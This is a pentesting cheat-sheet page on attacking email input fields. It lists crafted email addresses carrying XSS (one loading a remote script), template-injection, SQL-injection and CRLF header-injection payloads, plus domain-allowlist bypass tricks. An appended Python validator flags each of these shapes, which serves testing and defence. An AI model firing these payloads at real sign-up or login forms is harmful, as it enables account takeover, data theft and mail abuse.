Pentest Book
Email attacks
| Attack | Payload |
| --- | --- |
| XSS | `test+(alert(0))@example.com` <br> `[email protected](alert(0)).com` <br> `"alert(0)"@example.com` <br> `<script src=//xsshere?”@email.com` |
| Template injection | `"<%= 7 * 7 %>"@example.com` <br> `test+(${{7*7}})@example.com` |
| SQLi | `"' OR 1=1 -- '"@example.com` <br> `"mail'); SELECT version();--"@example.com` <br> `a'-IF(LENGTH(database())=9,SLEEP(7),0)or'1'='1\"@a.com` |
| Parameter Pollution | |
| (Email) Header Injection | `"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com` <br> `"[email protected]>\r\nRCPT TO:<victim+"@test.com` |
| Wildcard abuse | `%@example.com` |
```
# Bypass whitelist
inti(;[email protected];)@whitelisted.com
[email protected](@whitelisted.com)
inti+(@whitelisted.com;)@inti.io

# HTML Injection in Gmail
inti.de.ceukelaire+(<b>bold<u>underline<s>strike<br/>newline<strong>strong<sup>sup<sub>sub)@gmail.com

# Bypass strict validators
# Login with SSO & integrations
GitHub & Salesforce allow XSS in email, create account and abuse with login integration

# Common email accounts
bug(s)@
```
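Validation-side view, added here as an example and not part of the original Pentest Book page: a strict allow-list check that flags the address shapes the payloads above rely on (a `(...)` comment, a quoted local part, raw or URL-encoded CR/LF, a second `@`), and a domain allowlist that is consulted only for addresses that passed it. The regexes, flag names and sample list are my own assumptions.

```python
import re

# Conservative allow-list (assumed, not from the page): plain local part plus a
# dotted domain. Quoted local parts and (...) comments are legal RFC 5322 syntax,
# but a signup form has no reason to accept them, and every payload above needs one.
LOCAL_PART = re.compile(r"^[A-Za-z0-9._+-]{1,64}$")
DOMAIN = re.compile(r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}$")
CRLF = re.compile(r"[\r\n]|%0[dD]|%0[aA]")  # raw or URL-encoded line breaks


def email_risk_flags(addr: str) -> list[str]:
    """Name each property of addr that a strict validator should reject.

    at-count: second '@' (allow-list bypass), comment: '(...)' carrier,
    quoted: '"..."' local part (XSS/SQLi/header payload carrier),
    crlf: header injection, *-charset: anything outside the allow-list.
    """
    flags = []
    if addr.count("@") != 1:
        flags.append("at-count")
    if "(" in addr or ")" in addr:
        flags.append("comment")
    if '"' in addr:
        flags.append("quoted")
    if CRLF.search(addr):
        flags.append("crlf")
    local, _, domain = addr.rpartition("@")
    if not LOCAL_PART.fullmatch(local):
        flags.append("local-charset")
    if not DOMAIN.fullmatch(domain):
        flags.append("domain-charset")
    return flags


def allowed_domain(addr: str, allowlist: set[str]) -> bool:
    """Trust the domain only after the strict check: a loose regex that merely
    finds '@whitelisted.com' somewhere matches it inside a comment too."""
    if email_risk_flags(addr):
        return False
    return addr.rpartition("@")[2].lower() in allowlist


# Constructed samples: payload shapes from the table beside a plain address.
SAMPLES = ["alice@example.com", "test+(alert(0))@example.com",
           '"alert(0)"@example.com', "%@example.com",
           '"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com',
           "inti+(@whitelisted.com;)@inti.io"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r}: {email_risk_flags(s) or 'ok'}")
```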
Last modified 10mo ago